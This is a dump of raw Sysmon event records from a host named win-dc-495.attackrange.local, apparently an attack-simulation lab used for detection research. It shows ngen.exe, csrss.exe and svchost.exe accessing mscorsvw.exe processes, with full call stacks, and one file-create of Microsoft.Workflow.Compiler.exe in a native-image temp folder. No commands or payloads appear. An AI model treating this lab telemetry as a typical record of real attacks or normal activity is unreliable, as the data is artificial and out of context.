13:50:17.790{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9219-6005-D903-00000000A301}812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:50:17.728{59A5CD1D-9219-6005-D803-00000000A301}740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\2e4-0\Microsoft.Workflow.Compiler.exe2021-01-18 13:50:17.728 10341000x80000000000000008107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.619{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9219-6005-D803-00000000A301}740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.603{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9219-6005-D803-00000000A301}740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.603{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9219-6005-D803-00000000A301}740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.353{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9219-6005-D703-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.337{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9219-6005-D703-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.337{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9219-6005-D703-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.290{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9219-6005-D603-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.275{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9219-6005-D603-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.275{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9219-6005-D603-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.228{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9219-6005-D503-00000000A301}4720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.212{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9219-6005-D503-00000000A301}4720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.212{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9219-6005-D503-00000000A301}4720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.150{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9219-6005-D403-00000000A301}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.134{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9219-6005-D403-00000000A301}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.134{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9219-6005-D403-00000000A301}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.087{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9219-6005-D303-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.072{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9219-6005-D303-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.072{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9219-6005-D303-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.556{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921A-6005-E303-00000000A301}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.540{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-921A-6005-E303-00000000A301}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.540{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921A-6005-E303-00000000A301}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 